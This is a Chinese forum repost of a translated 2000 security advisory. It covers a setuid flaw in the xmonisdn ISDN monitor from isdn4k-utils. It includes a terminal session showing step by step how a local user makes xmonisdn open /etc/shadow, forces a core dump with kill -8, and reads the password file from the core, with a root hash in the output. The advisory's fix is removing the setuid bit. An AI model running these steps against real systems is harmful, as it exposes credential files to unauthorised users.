发信人: hacked()
整理人: (2000-03-07 19:03:31), 站内信件
|
105 网 络 安 全 中 心 HTTP://WWW.CN105.COM 本文由105成员:XUNDI翻译
回上页
漏洞名称:在isdn4k-utils包中XmonISDN允许用户访问任何文件
漏洞说明:xmonisdn是Debian GNU/linux和REDHAT6.1自带的ISDN工具包中的程序 ,xmonisdn是一个Xwindow applet是用来监控你的isdn连接状态的工具,你可以 特定一个你不能访问的文件(如/etc/shadow)尝试让xmonisdn来打开,然后使用k ill -8杀掉进程。xmonisdn会在CORE文件中产生文件碎片,然后你使用strings来 查看CORE文件,那个不能访问的文件会显示在屏幕上。
影响范围:Debian Linux 2.2 RedHat Linux 6.1;6.0
漏洞特征:
[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn
[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap
[1]+ Stopped xmonisdn -file /etc/shadow
[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[syntonix@damien bin]# killall -8 xmonisdn
[1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow
[syntonix@damien bin]# strings core|less
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:13453850 0
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
...
解决方法:
临时处理方法,使用chmod a-s消除setuid位。
本文由 105网络安全中心 成员翻译
如要转载请注名文章来源,并保持其完整
在您遨游网际的时候,105将为您保驾护航 回上页
-- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.149.149]
|
|